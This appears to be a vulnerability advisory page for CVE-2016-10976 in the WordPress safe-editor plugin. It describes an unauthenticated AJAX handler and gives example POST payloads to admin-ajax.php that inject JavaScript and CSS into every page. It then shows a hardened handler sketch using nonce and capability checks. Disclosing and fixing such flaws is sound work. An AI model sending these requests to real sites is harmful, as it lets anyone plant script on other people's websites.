Unsafe CSS/JS-injection in safe-editor v1.
Title | Published | Family |
---|---|---|
CVE-2016-10976 | 17 Sep 2019 15:15 | nvd |
CVE-2016-10976 | 22 May 2025 09:07 | redhatcve |
CVE-2016-10976 | 17 Sep 2019 15:15 | cve |
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection | 6 May 2016 00:00 | wpvulndb |
CVE-2016-10976 | 17 Sep 2019 14:05 | cvelist |
Authentication flaw | 17 Sep 2019 15:15 | prion |
Safe Editor Plugin < 1.2 - CSS/JS-injection | 7 Nov 2024 07:40 | nuclei |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset |
In the file "index.php" (in the root folder), on lines 188 and 189, you can see that both the private and the public AJAX hooks are registered and that both reference the function "se_save".
This function performs no authentication check and no string sanitization. You can therefore inject whatever you want wherever "wp_footer" and "wp_head" are called. Using, for example, cURL or the Chrome app Postman, this can be exploited with ease.
Example:
URL: http://www.site.com/wp-admin/admin-ajax.php
(POST data displayed as JSON)
```
# JS injection
{
    type: 'js',
    data: 'alert("Hello world!");',
    action: 'se_save'
}

# CSS injection
{
    type: 'css',
    data: 'body { display: none !important; }',
    action: 'se_save'
}
```
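A hardened handler for the pattern described above, as an added example (not the plugin's own code or its actual fix). The function name `example_se_save`, the nonce action and field name, and the `example_se_*` option names are assumptions; only the `se_save` action and the `type`/`data` fields come from the advisory.

```php
<?php
/**
 * Plugin Name: se_save hardening sketch (added example, hypothetical names)
 */

// Register only the authenticated hook. Leaving out wp_ajax_nopriv_se_save
// means logged-out visitors can no longer reach the handler at all.
add_action( 'wp_ajax_se_save', 'example_se_save' );

function example_se_save() {
    // CSRF check: the editor form must send a nonce created with
    // wp_create_nonce( 'example_se_save' ) in the "nonce" field (assumed name).
    // check_ajax_referer() terminates the request if the nonce is invalid.
    check_ajax_referer( 'example_se_save', 'nonce' );

    // Authorization: the stored value is printed site-wide in wp_head and
    // wp_footer, so require the capability that permits raw markup and script.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $type = isset( $_POST['type'] ) ? sanitize_key( wp_unslash( $_POST['type'] ) ) : '';
    $data = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';

    // Accept only the two types the advisory shows, and only string payloads.
    if ( ! in_array( $type, array( 'css', 'js' ), true ) || ! is_string( $data ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    if ( 'css' === $type ) {
        // CSS is emitted inside a <style> element; stripping tags keeps the
        // value from closing that element and starting new markup.
        $data = wp_strip_all_tags( $data );
    }

    // Option names are hypothetical; the real plugin's storage keys are not
    // given on this page.
    update_option( 'example_se_' . $type, $data, false );
    wp_send_json_success();
}
```

The JS payload is stored as submitted because the feature exists to let a trusted administrator add script; the protection there is the capability and nonce check, not content filtering.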